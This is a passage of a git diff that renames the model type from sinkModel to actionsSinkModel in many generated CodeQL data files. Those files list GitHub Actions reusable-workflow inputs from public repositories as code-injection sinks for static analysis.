b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.test", "code-injection", "generated"] - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml index dd20d3100794..6ba2fc75375d 100644 --- a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image-aio", "code-injection", "generated"] - ["mudler/localai/.github/workflows/image_build.yml", "*", "input.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml index 3b9777b3f3a5..6d522b776dcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.amazonflag", "code-injection", "generated"] - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "input.magiskver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml index 3561bd15c366..c210f350439a 100644 --- a/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/n8n-io_n8n.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["n8n-io/n8n/.github/workflows/e2e-reusable.yml", "*", "input.pr_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml index 29da5a83b629..81eeb82033cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/napari_napari.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["napari/napari/.github/workflows/reusable_run_tox_test.yml", "*", "input.qt_backend", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml index 9b92197cf5d9..6d81f2ff242a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nasa_fprime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.target_platform", "code-injection", "generated"] - ["nasa/fprime/.github/workflows/reusable-project-builder.yml", "*", "input.fprime_location", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml index cbed3964cffd..b7ea7250825c 100644 --- a/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nautobot_nautobot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nautobot/nautobot/.github/workflows/plugin_upstream_testing_base.yml", "*", "input.invoke_context_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml index 29b47c043360..972b6f15baa4 100644 --- a/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nektos_act.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.with_default", "code-injection", "generated"] - ["nektos/act/pkg/runner/testdata/workflow_call_inputs/workflow_call_inputs.yml", "*", "input.required", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml index 3b8a83bc8c64..07f0c5c0f691 100644 --- a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"] - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml index 3c406b3bc0e6..6bbf33e7f89a 100644 --- a/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["neovim/neovim/.github/workflows/test_windows.yml", "*", "input.build_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml index 3a94887f8ffb..165965dd568a 100644 --- a/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nethermindeth_nethermind.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.custom_run_id", "code-injection", "generated"] - ["nethermindeth/nethermind/.github/workflows/run-a-single-node-from-branch.yml", "*", "input.non_validator_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml index 5198d5f418a5..3d1e182458e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-dotnet-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-dotnet-agent/.github/workflows/publish_release_notes.yml", "*", "input.agent_version", "code-injection", "generated"] - ["newrelic/newrelic-dotnet-agent/.github/workflows/post_deploy_agent.yml", "*", "input.test_mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml index e3694a389735..689cc91871ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_newrelic-java-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/newrelic-java-agent/.github/workflows/X-Reusable-VerifyInstrumentation.yml", "*", "input.page", "code-injection", "generated"] - ["newrelic/newrelic-java-agent/.github/workflows/GHA-Unit-Tests.yaml", "*", "input.agent-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml index f6f33154581e..0481c04cb671 100644 --- a/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/newrelic_node-newrelic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.changelog_file", "code-injection", "generated"] - ["newrelic/node-newrelic/.github/workflows/release-creation.yml", "*", "input.workflows", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml index 34efc8414d89..8c0c944a3937 100644 --- a/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nexus-mods_nexusmods.app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.AppVersion", "code-injection", "generated"] - ["nexus-mods/nexusmods.app/.github/workflows/build-windows-pupnet.yaml", "*", "input.PupNetVersion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml index 71866026ef91..8f4c44324088 100644 --- a/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nginxinc_kubernetes-ingress.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.target_tag", "code-injection", "generated"] - ["nginxinc/kubernetes-ingress/.github/workflows/retag-images.yml", "*", "input.source_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml index 83d241d21c0c..9406f7d299cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/nocodb_nocodb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.shard", "code-injection", "generated"] - ["nocodb/nocodb/.github/workflows/playwright-test-workflow.yml", "*", "input.db", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml index 3021de125684..36838ef4ddb1 100644 --- a/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/novuhq_novu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.docker_image", "code-injection", "generated"] - ["novuhq/novu/.github/workflows/reusable-workers-service-deploy.yml", "*", "input.terraform_workspace", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml index d2cb1da1e9fd..8b16601e6c22 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/abbrev-js/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml index c551a135a142..e8db2ff568de 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.npmVersion", "code-injection", "generated"] - ["npm/cli/.github/workflows/node-integration.yml", "*", "input.nodeVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml index f469f5de268d..208e444adebc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/fs-minipass/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml index 7ec8dac3f7bb..41edf0b03737 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/hosted-git-info/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml index 4ce9252ce76c..faca7973f1f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/ini/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml index abb5b43c3276..76db6821c5e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/json-parse-even-better-errors/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml index 9e9da70e88ec..383a88ed0556 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/minify-registry-metadata/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml index 8de3f4c1ca4a..bcd3b09ed688 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 5ec8c0969346..53e16f8771a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index af9582282d0d..4310e028de16 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 61bbb9d53728..84d2f57a3fbc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index fdb440a742ff..7debf6960edc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index efd05d69abe4..640180b870af 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 9be191425ffd..7ea3039b552b 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 65a14c7cfaa1..ced66aee32f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 2c031ea9dc62..e63440d1fcae 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index b90aacee9ca1..f7021148c514 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 56823f4e1acc..8345368057c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 0f2937f9d148..3754ebfa63d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index a88c74f85375..3e35747b558a 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index b7dfd8fcc9b1..a13f6863caa5 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 9de8130a93e6..af5c300ea8bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ea4980b8cd7a..449ea8b7b490 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 8787c7e32c9a..6656d42c4e69 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index ea55d53c215f..6e7fdc34a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index add2fe0d2e2e..8fc02a27e1cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 400cd50b59f9..80f19676b4a7 100644 --- 